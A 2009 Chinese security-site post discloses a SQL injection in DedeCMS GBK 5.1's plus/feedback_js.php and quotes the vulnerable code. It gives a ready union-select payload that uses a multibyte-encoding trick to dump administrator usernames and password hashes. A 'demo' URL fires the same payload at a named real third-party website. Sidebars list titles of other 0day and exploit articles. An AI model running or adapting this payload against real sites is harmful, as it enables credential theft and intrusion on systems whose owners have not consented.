首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
dedecms(plus/feedback_js.php)注射漏洞
来源:http://bbs.erpangzi.com 作者:St0p 发布时间:2009-10-12  

发现者:Rainy'Fox&St0p
Team:二胖子网安(http://bbs.erpangzi.com)
影响版本:
dedecms GBK 5.1
漏洞描述:
文件:plus/feedback_js.php
if(empty($arcID))
{
    $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
    if(is_array($row)) $urlindex = $row['id'];
}
获得变量arcurl,直接放入数据库查询.导致注入产生,介于对于php环境如果设置了magic_quote_gpc=on的问题.可以结合php多字节编码漏洞构造.
利用:
http://localhost/plus/feedback_js.php?arcurl=%cf' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback d where 1=2  and ''='" from dede_admin where ''='
经过测试,得出结论,magic_quotes_gpc = On的时候目前语句还不行,编码尚未突破
演示:
http://www.yxwo.cn/plus/feedback_js.php?arcurl=%cf'%20union%20select%20"'%20and%201=2%20union%20select%201,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1%20as%20msg%20from%20yxwodede_admin%20where%201=1%20union%20select%20*%20from%20yxwodede_feedback%20d%20where%201=2%20%20and%20''='"%20from%20yxwodede_admin%20where%20''=' 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·大榕树网络文章管理系统0day
·深度学习(asp)网址导航0day
·动网论坛DvBBS boardrule.php模
·最新的游戏箱子收信程序上传漏洞
·科讯CMS文件名解析漏洞
·AspBar V3.0整站管理系统0day
·tomcat和jboss网站%00欺骗
·DEDECMS 5.1 feedback_js.php 0D
·中易广告联盟系统(ZYADS) sql注
·睛天电影系统0DAY
·PunBB官方上传附件扩展注射漏洞
·花马收信箱子Getshell 0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved